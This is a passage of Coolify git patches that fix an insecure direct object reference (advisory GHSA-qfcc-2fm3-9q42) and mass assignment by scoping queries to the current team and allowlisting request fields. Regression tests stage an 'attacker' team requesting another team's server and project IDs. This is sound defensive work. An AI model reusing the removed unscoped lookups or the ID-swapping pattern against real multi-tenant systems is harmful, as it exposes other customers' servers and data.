+        ->toContain('regex:'.ValidationPatterns::DOCKER_NETWORK_PATTERN);
+});
+
+it('generates nullable dockerNetworkRules when not required', function () {
+    $rules = ValidationPatterns::dockerNetworkRules(required: false);
+
+    expect($rules)->toContain('nullable')
+        ->not->toContain('required');
+});

From e36622fdfb60df2bb733c37d6f0f4f7ac8b61486 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:29:08 +0100
Subject: [PATCH 167/213] refactor: scope server and project queries to current
 team

Ensure Server and Project lookups in Livewire components and API
controllers use team-scoped queries (ownedByCurrentTeam / whereTeamId)
instead of unscoped find/where calls. This enforces consistent
multi-tenant isolation across all user-facing code paths.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Http/Controllers/Api/DeployController.php |   2 +-
 app/Livewire/Boarding/Index.php               |   6 +-
 app/Livewire/GlobalSearch.php                 |   4 +-
 app/Livewire/Project/CloneMe.php              |   2 +-
 app/Livewire/Project/DeleteProject.php        |   4 +-
 app/Livewire/Project/New/DockerCompose.php    |   2 +-
 app/Livewire/Project/New/DockerImage.php      |   2 +-
 .../Project/New/GithubPrivateRepository.php   |   2 +-
 .../New/GithubPrivateRepositoryDeployKey.php  |   2 +-
 .../Project/New/PublicGitRepository.php       |   2 +-
 app/Livewire/Project/New/Select.php           |   4 +-
 app/Livewire/Project/New/SimpleDockerfile.php |   2 +-
 .../CrossTeamIdorServerProjectTest.php        | 182 ++++++++++++++++++
 13 files changed, 199 insertions(+), 17 deletions(-)
 create mode 100644 tests/Feature/CrossTeamIdorServerProjectTest.php

diff --git a/app/Http/Controllers/Api/DeployController.php b/app/Http/Controllers/Api/DeployController.php
index 85d532f62..e490f3b0c 100644
--- a/app/Http/Controllers/Api/DeployController.php
+++ b/app/Http/Controllers/Api/DeployController.php
@@ -250,7 +250,7 @@ public function cancel_deployment(Request $request)
             ]);
 
             // Get the server
-            $server = Server::find($build_server_id);
+            $server = Server::whereTeamId($teamId)->find($build_server_id);
 
             if ($server) {
                 // Add cancellation log entry
diff --git a/app/Livewire/Boarding/Index.php b/app/Livewire/Boarding/Index.php
index 0f6f45d83..d7fa67b7b 100644
--- a/app/Livewire/Boarding/Index.php
+++ b/app/Livewire/Boarding/Index.php
@@ -121,7 +121,7 @@ public function mount()
             }
 
             if ($this->selectedExistingServer) {
-                $this->createdServer = Server::find($this->selectedExistingServer);
+                $this->createdServer = Server::ownedByCurrentTeam()->find($this->selectedExistingServer);
                 if ($this->createdServer) {
                     $this->serverPublicKey = $this->createdServer->privateKey->getPublicKey();
                     $this->updateServerDetails();
@@ -145,7 +145,7 @@ public function mount()
         }
 
         if ($this->selectedProject) {
-            $this->createdProject = Project::find($this->selectedProject);
+            $this->createdProject = Project::ownedByCurrentTeam()->find($this->selectedProject);
             if (! $this->createdProject) {
                 $this->projects = Project::ownedByCurrentTeam(['name'])->get();
             }
@@ -431,7 +431,7 @@ public function getProjects()
 
     public function selectExistingProject()
     {
-        $this->createdProject = Project::find($this->selectedProject);
+        $this->createdProject = Project::ownedByCurrentTeam()->find($this->selectedProject);
         $this->currentState = 'create-resource';
     }
 
diff --git a/app/Livewire/GlobalSearch.php b/app/Livewire/GlobalSearch.php
index f910110dc..154748b47 100644
--- a/app/Livewire/GlobalSearch.php
+++ b/app/Livewire/GlobalSearch.php
@@ -1203,7 +1203,7 @@ public function selectServer($serverId, $shouldProgress = true)
     public function loadDestinations()
     {
         $this->loadingDestinations = true;
-        $server = Server::find($this->selectedServerId);
+        $server = Server::ownedByCurrentTeam()->find($this->selectedServerId);
 
         if (! $server) {
             $this->loadingDestinations = false;
@@ -1280,7 +1280,7 @@ public function selectProject($projectUuid, $shouldProgress = true)
     public function loadEnvironments()
     {
         $this->loadingEnvironments = true;
-        $project = Project::where('uuid', $this->selectedProjectUuid)->first();
+        $project = Project::ownedByCurrentTeam()->where('uuid', $this->selectedProjectUuid)->first();
 
         if (! $project) {
             $this->loadingEnvironments = false;
diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index 3b3e42619..e9184a154 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -54,7 +54,7 @@ protected function messages(): array
     public function mount($project_uuid)
     {
         $this->project_uuid = $project_uuid;
-        $this->project = Project::where('uuid', $project_uuid)->firstOrFail();
+        $this->project = Project::ownedByCurrentTeam()->where('uuid', $project_uuid)->firstOrFail();
         $this->environment = $this->project->environments->where('uuid', $this->environment_uuid)->first();
         $this->project_id = $this->project->id;
         $this->servers = currentTeam()
diff --git a/app/Livewire/Project/DeleteProject.php b/app/Livewire/Project/DeleteProject.php
index a018046fd..d95041c2d 100644
--- a/app/Livewire/Project/DeleteProject.php
+++ b/app/Livewire/Project/DeleteProject.php
@@ -21,7 +21,7 @@ class DeleteProject extends Component
     public function mount()
     {
         $this->parameters = get_route_parameters();
-        $this->projectName = Project::findOrFail($this->project_id)->name;
+        $this->projectName = Project::ownedByCurrentTeam()->findOrFail($this->project_id)->name;
     }
 
     public function delete()
@@ -29,7 +29,7 @@ public function delete()
         $this->validate([
             'project_id' => 'required|int',
         ]);
-        $project = Project::findOrFail($this->project_id);
+        $project = Project::ownedByCurrentTeam()->findOrFail($this->project_id);
         $this->authorize('delete', $project);
 
         if ($project->isEmpty()) {
diff --git a/app/Livewire/Project/New/DockerCompose.php b/app/Livewire/Project/New/DockerCompose.php
index 634a012c0..5732e0cd5 100644
--- a/app/Livewire/Project/New/DockerCompose.php
+++ b/app/Livewire/Project/New/DockerCompose.php
@@ -41,7 +41,7 @@ public function submit()
             // Validate for command injection BEFORE saving to database
             validateDockerComposeForInjection($this->dockerComposeRaw);
 
-            $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
             $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
 
             $destination_uuid = $this->query['destination'];
diff --git a/app/Livewire/Project/New/DockerImage.php b/app/Livewire/Project/New/DockerImage.php
index 8aff83153..545afdd0b 100644
--- a/app/Livewire/Project/New/DockerImage.php
+++ b/app/Livewire/Project/New/DockerImage.php
@@ -121,7 +121,7 @@ public function submit()
         }
         $destination_class = $destination->getMorphClass();
 
-        $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+        $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
         $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
 
         // Append @sha256 to image name if using digest and not already present
diff --git a/app/Livewire/Project/New/GithubPrivateRepository.php b/app/Livewire/Project/New/GithubPrivateRepository.php
index 61ae0e151..d1993b4ac 100644
--- a/app/Livewire/Project/New/GithubPrivateRepository.php
+++ b/app/Livewire/Project/New/GithubPrivateRepository.php
@@ -185,7 +185,7 @@ public function submit()
             }
             $destination_class = $destination->getMorphClass();
 
-            $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
             $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
 
             $application = Application::create([
diff --git a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
index e46ad7d78..30c8ded4f 100644
--- a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
+++ b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
@@ -144,7 +144,7 @@ public function submit()
             // Note: git_repository has already been validated and transformed in get_git_source()
             // It may now be in SSH format (git@host:repo.git) which is valid for deploy keys
 
-            $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
             $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
             if ($this->git_source === 'other') {
                 $application_init = [
diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index 3df31a6a3..731584edf 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -278,7 +278,7 @@ public function submit()
             }
             $destination_class = $destination->getMorphClass();
 
-            $project = Project::where('uuid', $project_uuid)->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $project_uuid)->first();
             $environment = $project->load(['environments'])->environments->where('uuid', $environment_uuid)->first();
 
             if ($this->build_pack === 'dockercompose' && isDev() && $this->new_compose_services) {
diff --git a/app/Livewire/Project/New/Select.php b/app/Livewire/Project/New/Select.php
index c5dc13987..165e4b59e 100644
--- a/app/Livewire/Project/New/Select.php
+++ b/app/Livewire/Project/New/Select.php
@@ -65,7 +65,7 @@ public function mount()
                 $this->existingPostgresqlUrl = 'postgres://coolify:password@coolify-db:5432';
             }
             $projectUuid = data_get($this->parameters, 'project_uuid');
-            $project = Project::whereUuid($projectUuid)->firstOrFail();
+            $project = Project::ownedByCurrentTeam()->whereUuid($projectUuid)->firstOrFail();
             $this->environments = $project->environments;
             $this->selectedEnvironment = $this->environments->where('uuid', data_get($this->parameters, 'environment_uuid'))->firstOrFail()->name;
 
@@ -79,7 +79,7 @@ public function mount()
                 $this->type = $queryType;
                 $this->server_id = $queryServerId;
                 $this->destination_uuid = $queryDestination;
-                $this->server = Server::find($queryServerId);
+                $this->server = Server::ownedByCurrentTeam()->find($queryServerId);
                 $this->current_step = 'select-postgresql-type';
             }
         } catch (\Exception $e) {
diff --git a/app/Livewire/Project/New/SimpleDockerfile.php b/app/Livewire/Project/New/SimpleDockerfile.php
index 9cc4fbbe2..a87da7884 100644
--- a/app/Livewire/Project/New/SimpleDockerfile.php
+++ b/app/Livewire/Project/New/SimpleDockerfile.php
@@ -45,7 +45,7 @@ public function submit()
         }
         $destination_class = $destination->getMorphClass();
 
-        $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+        $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
         $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
 
         $port = get_port_from_dockerfile($this->dockerfile);
diff --git a/tests/Feature/CrossTeamIdorServerProjectTest.php b/tests/Feature/CrossTeamIdorServerProjectTest.php
new file mode 100644
index 000000000..173dae5cd
--- /dev/null
+++ b/tests/Feature/CrossTeamIdorServerProjectTest.php
@@ -0,0 +1,182 @@
+<?php
+
+use App\Livewire\Boarding\Index as BoardingIndex;
+use App\Livewire\GlobalSearch;
+use App\Livewire\Project\CloneMe;
+use App\Livewire\Project\DeleteProject;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    // Attacker: Team A
+    $this->userA = User::factory()->create();
+    $this->teamA = Team::factory()->create();
+    $this->userA->teams()->attach($this->teamA, ['role' => 'owner']);
+
+    $this->serverA = Server::factory()->create(['team_id' => $this->teamA->id]);
+    $this->projectA = Project::factory()->create(['team_id' => $this->teamA->id]);
+    $this->environmentA = Environment::factory()->create(['project_id' => $this->projectA->id]);
+
+    // Victim: Team B
+    $this->userB = User::factory()->create();
+    $this->teamB = Team::factory()->create();
+    $this->userB->teams()->attach($this->teamB, ['role' => 'owner']);
+
+    $this->serverB = Server::factory()->create(['team_id' => $this->teamB->id]);
+    $this->projectB = Project::factory()->create(['team_id' => $this->teamB->id]);
+    $this->environmentB = Environment::factory()->create(['project_id' => $this->projectB->id]);
+
+    // Act as attacker (Team A)
+    $this->actingAs($this->userA);
+    session(['currentTeam' => $this->teamA]);
+});
+
+describe('Boarding Server IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+    test('boarding mount cannot load server from another team via selectedExistingServer', function () {
+        $component = Livewire::test(BoardingIndex::class, [
+            'selectedServerType' => 'remote',
+            'selectedExistingServer' => $this->serverB->id,
+        ]);
+
+        // The server from Team B should NOT be loaded
+        expect($component->get('createdServer'))->toBeNull();
+    });
+
+    test('boarding mount can load own team server via selectedExistingServer', function () {
+        $component = Livewire::test(BoardingIndex::class, [
+            'selectedServerType' => 'remote',
+            'selectedExistingServer' => $this->serverA->id,
+        ]);
+
+        // Own team server should load successfully
+        expect($component->get('createdServer'))->not->toBeNull();
+        expect($component->get('createdServer')->id)->toBe($this->serverA->id);
+    });
+});
+
+describe('Boarding Project IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+    test('boarding mount cannot load project from another team via selectedProject', function () {
+        $component = Livewire::test(BoardingIndex::class, [
+            'selectedProject' => $this->projectB->id,
+        ]);
+
+        // The project from Team B should NOT be loaded
+        expect($component->get('createdProject'))->toBeNull();
+    });
+
+    test('boarding selectExistingProject cannot load project from another team', function () {
+        $component = Livewire::test(BoardingIndex::class)
+            ->set('selectedProject', $this->projectB->id)
+            ->call('selectExistingProject');
+
+        expect($component->get('createdProject'))->toBeNull();
+    });
+
+    test('boarding selectExistingProject can load own team project', function () {
+        $component = Livewire::test(BoardingIndex::class)
+            ->set('selectedProject', $this->projectA->id)
+            ->call('selectExistingProject');
+
+        expect($component->get('createdProject'))->not->toBeNull();
+        expect($component->get('createdProject')->id)->toBe($this->projectA->id);
+    });
+});
+
+describe('GlobalSearch Server IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+    test('loadDestinations cannot access server from another team', function () {
+        $component = Livewire::test(GlobalSearch::class)
+            ->set('selectedServerId', $this->serverB->id)
+            ->call('loadDestinations');
+
+        // Should dispatch error because server is not found (team-scoped)
+        $component->assertDispatched('error');
+    });
+});
+
+describe('GlobalSearch Project IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+    test('loadEnvironments cannot access project from another team', function () {
+        $component = Livewire::test(GlobalSearch::class)
+            ->set('selectedProjectUuid', $this->projectB->uuid)
+            ->call('loadEnvironments');
+
+        // Should not load environments from another team's project
+        expect($component->get('availableEnvironments'))->toBeEmpty();
+    });
+});
+
+describe('DeleteProject IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+    test('cannot mount DeleteProject with project from another team', function () {
+        // Should throw ModelNotFoundException (404) because team-scoped query won't find it
+        Livewire::test(DeleteProject::class, ['project_id' => $this->projectB->id])
+            ->assertStatus(500); // findOrFail throws ModelNotFoundException
+    })->throws(\Illuminate\Database\Eloquent\ModelNotFoundException::class);
+
+    test('can mount DeleteProject with own team project', function () {
+        $component = Livewire::test(DeleteProject::class, ['project_id' => $this->projectA->id]);
+
+        expect($component->get('projectName'))->toBe($this->projectA->name);
+    });
+});
+
+describe('CloneMe Project IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+    test('cannot mount CloneMe with project UUID from another team', function () {
+        // Should throw ModelNotFoundException because team-scoped query won't find it
+        Livewire::test(CloneMe::class, [
+            'project_uuid' => $this->projectB->uuid,
+            'environment_uuid' => $this->environmentB->uuid,
+        ]);
+    })->throws(\Illuminate\Database\Eloquent\ModelNotFoundException::class);
+
+    test('can mount CloneMe with own team project UUID', function () {
+        $component = Livewire::test(CloneMe::class, [
+            'project_uuid' => $this->projectA->uuid,
+            'environment_uuid' => $this->environmentA->uuid,
+        ]);
+
+        expect($component->get('project_id'))->toBe($this->projectA->id);
+    });
+});
+
+describe('DeployController API Server IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+    test('deploy cancel API cannot access build server from another team', function () {
+        // Create a deployment queue entry that references Team B's server as build_server
+        $application = \App\Models\Application::factory()->create([
+            'environment_id' => $this->environmentA->id,
+            'destination_id' => StandaloneDocker::factory()->create(['server_id' => $this->serverA->id])->id,
+            'destination_type' => StandaloneDocker::class,
+        ]);
+
+        $deployment = \App\Models\ApplicationDeploymentQueue::create([
+            'application_id' => $application->id,
+            'deployment_uuid' => 'test-deploy-' . fake()->uuid(),
+            'server_id' => $this->serverA->id,
+            'build_server_id' => $this->serverB->id, // Cross-team build server
+            'status' => \App\Enums\ApplicationDeploymentStatus::IN_PROGRESS->value,
+        ]);
+
+        $token = $this->userA->createToken('test-token', ['*']);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer ' . $token->plainTextToken,
+        ])->deleteJson("/api/v1/deployments/{$deployment->deployment_uuid}");
+
+        // The cancellation should proceed but the build_server should NOT be found
+        // (team-scoped query returns null for Team B's server)
+        // The deployment gets cancelled but no remote process runs on the wrong server
+        $response->assertOk();
+
+        // Verify the deployment was cancelled
+        $deployment->refresh();
+        expect($deployment->status)->toBe(
+            \App\Enums\ApplicationDeploymentStatus::CANCELLED_BY_USER->value
+        );
+    });
+});

From 67a4fcc2ab8134f905f32fab8057b3c11e18fbb2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:32:57 +0100
Subject: [PATCH 168/213] fix: add mass assignment protection to models

Replace $guarded = [] with explicit $fillable whitelists across all
models. Update controllers to use request->only($allowedFields) when
assigning request data. Switch Livewire components to forceFill() for
explicit mass assignment. Add integration tests for mass assignment
protection.
---
 .../Api/ApplicationsController.php            |  14 +-
 .../Controllers/Api/DatabasesController.php   |  16 +-
 .../Controllers/Api/SecurityController.php    |   7 +-
 app/Livewire/Project/CloneMe.php              |  34 ++--
 .../Project/Shared/ResourceOperations.php     |  59 +++---
 app/Models/Application.php                    | 109 +++++++++--
 app/Models/Server.php                         |   2 -
 app/Models/Service.php                        |  14 +-
 app/Models/StandaloneClickhouse.php           |  26 ++-
 app/Models/StandaloneDragonfly.php            |  25 ++-
 app/Models/StandaloneKeydb.php                |  26 ++-
 app/Models/StandaloneMariadb.php              |  27 ++-
 app/Models/StandaloneMongodb.php              |  26 ++-
 app/Models/StandaloneMysql.php                |  27 ++-
 app/Models/StandalonePostgresql.php           |  29 ++-
 app/Models/StandaloneRedis.php                |  24 ++-
 app/Models/Team.php                           |   9 +-
 app/Models/User.php                           |  19 +-
 bootstrap/helpers/applications.php            |  13 +-
 .../Feature/MassAssignmentProtectionTest.php  | 182 ++++++++++++++++++
 20 files changed, 593 insertions(+), 95 deletions(-)
 create mode 100644 tests/Feature/MassAssignmentProtectionTest.php

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index ad1f50ea2..82d662177 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -1158,7 +1158,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
             $dockerComposeDomainsJson = collect();
             if ($request->has('docker_compose_domains')) {
                 $dockerComposeDomains = collect($request->docker_compose_domains);
@@ -1385,7 +1385,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
 
             $dockerComposeDomainsJson = collect();
             if ($request->has('docker_compose_domains')) {
@@ -1585,7 +1585,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
 
             $dockerComposeDomainsJson = collect();
             if ($request->has('docker_compose_domains')) {
@@ -1772,7 +1772,7 @@ private function create_application(Request $request, $type)
             }
 
             $application = new Application;
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
             $application->fqdn = $fqdn;
             $application->ports_exposes = $port;
             $application->build_pack = 'dockerfile';
@@ -1884,7 +1884,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
             $application->fqdn = $fqdn;
             $application->build_pack = 'dockerimage';
             $application->destination_id = $destination->id;
@@ -2000,7 +2000,7 @@ private function create_application(Request $request, $type)
 
             $service = new Service;
             removeUnnecessaryFieldsFromRequest($request);
-            $service->fill($request->all());
+            $service->fill($request->only($allowedFields));
 
             $service->docker_compose_raw = $dockerComposeRaw;
             $service->environment_id = $environment->id;
@@ -2760,7 +2760,7 @@ public function update_by_uuid(Request $request)
 
         removeUnnecessaryFieldsFromRequest($request);
 
-        $data = $request->all();
+        $data = $request->only($allowedFields);
         if ($requestHasDomains && $server->isProxyShouldRun()) {
             data_set($data, 'fqdn', $domains);
         }
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 660ed4529..3fd1b8db8 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -1740,7 +1740,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('postgres_conf', $postgresConf);
             }
-            $database = create_standalone_postgresql($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_postgresql($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1795,7 +1795,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('mariadb_conf', $mariadbConf);
             }
-            $database = create_standalone_mariadb($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_mariadb($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1854,7 +1854,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('mysql_conf', $mysqlConf);
             }
-            $database = create_standalone_mysql($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_mysql($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1910,7 +1910,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('redis_conf', $redisConf);
             }
-            $database = create_standalone_redis($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_redis($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1947,7 +1947,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
             }
 
             removeUnnecessaryFieldsFromRequest($request);
-            $database = create_standalone_dragonfly($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_dragonfly($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1996,7 +1996,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('keydb_conf', $keydbConf);
             }
-            $database = create_standalone_keydb($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_keydb($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -2032,7 +2032,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 ], 422);
             }
             removeUnnecessaryFieldsFromRequest($request);
-            $database = create_standalone_clickhouse($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_clickhouse($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -2090,7 +2090,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('mongo_conf', $mongoConf);
             }
-            $database = create_standalone_mongodb($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_mongodb($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
diff --git a/app/Http/Controllers/Api/SecurityController.php b/app/Http/Controllers/Api/SecurityController.php
index e7b36cb9a..2c62928c2 100644
--- a/app/Http/Controllers/Api/SecurityController.php
+++ b/app/Http/Controllers/Api/SecurityController.php
@@ -4,6 +4,7 @@
 
 use App\Http\Controllers\Controller;
 use App\Models\PrivateKey;
+use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use OpenApi\Attributes as OA;
 
@@ -176,7 +177,7 @@ public function create_key(Request $request)
             return invalidTokenResponse();
         }
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validator = customApiValidator($request->all(), [
@@ -300,7 +301,7 @@ public function update_key(Request $request)
             return invalidTokenResponse();
         }
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -330,7 +331,7 @@ public function update_key(Request $request)
                 'message' => 'Private Key not found.',
             ], 404);
         }
-        $foundKey->update($request->all());
+        $foundKey->update($request->only($allowedFields));
 
         return response()->json(serializeApiResponse([
             'uuid' => $foundKey->uuid,
diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index 3b3e42619..3b04c3b7f 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -139,7 +139,7 @@ public function clone(string $type)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => $uuid,
                     'status' => 'exited',
                     'started_at' => null,
@@ -187,7 +187,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $newDatabase->id,
                     ]);
@@ -216,7 +216,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'resource_id' => $newDatabase->id,
                     ]);
                     $newStorage->save();
@@ -229,7 +229,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'uuid' => $uuid,
                         'database_id' => $newDatabase->id,
                         'database_type' => $newDatabase->getMorphClass(),
@@ -247,7 +247,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill($payload);
+                    ])->forceFill($payload);
                     $newEnvironmentVariable->save();
                 }
             }
@@ -258,7 +258,7 @@ public function clone(string $type)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => $uuid,
                     'environment_id' => $environment->id,
                     'destination_id' => $this->selectedDestination,
@@ -276,7 +276,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'uuid' => (string) new Cuid2,
                         'service_id' => $newService->id,
                         'team_id' => currentTeam()->id,
@@ -290,7 +290,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'resourceable_id' => $newService->id,
                         'resourceable_type' => $newService->getMorphClass(),
                     ]);
@@ -298,9 +298,9 @@ public function clone(string $type)
                 }
 
                 foreach ($newService->applications() as $application) {
-                    $application->update([
+                    $application->forceFill([
                         'status' => 'exited',
-                    ]);
+                    ])->save();
 
                     $persistentVolumes = $application->persistentStorages()->get();
                     foreach ($persistentVolumes as $volume) {
@@ -315,7 +315,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'name' => $newName,
                             'resource_id' => $application->id,
                         ]);
@@ -344,7 +344,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'resource_id' => $application->id,
                         ]);
                         $newStorage->save();
@@ -352,9 +352,9 @@ public function clone(string $type)
                 }
 
                 foreach ($newService->databases() as $database) {
-                    $database->update([
+                    $database->forceFill([
                         'status' => 'exited',
-                    ]);
+                    ])->save();
 
                     $persistentVolumes = $database->persistentStorages()->get();
                     foreach ($persistentVolumes as $volume) {
@@ -369,7 +369,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'name' => $newName,
                             'resource_id' => $database->id,
                         ]);
@@ -398,7 +398,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'resource_id' => $database->id,
                         ]);
                         $newStorage->save();
@@ -411,7 +411,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->fill([
+                        ])->forceFill([
                             'uuid' => $uuid,
                             'database_id' => $database->id,
                             'database_type' => $database->getMorphClass(),
diff --git a/app/Livewire/Project/Shared/ResourceOperations.php b/app/Livewire/Project/Shared/ResourceOperations.php
index e769e4bcb..a26b43026 100644
--- a/app/Livewire/Project/Shared/ResourceOperations.php
+++ b/app/Livewire/Project/Shared/ResourceOperations.php
@@ -7,9 +7,18 @@
 use App\Actions\Service\StartService;
 use App\Actions\Service\StopService;
 use App\Jobs\VolumeCloneJob;
+use App\Models\Application;
 use App\Models\Environment;
 use App\Models\Project;
+use App\Models\StandaloneClickhouse;
 use App\Models\StandaloneDocker;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
 use App\Models\SwarmDocker;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
@@ -60,7 +69,7 @@ public function cloneTo($destination_id)
         $uuid = (string) new Cuid2;
         $server = $new_destination->server;
 
-        if ($this->resource->getMorphClass() === \App\Models\Application::class) {
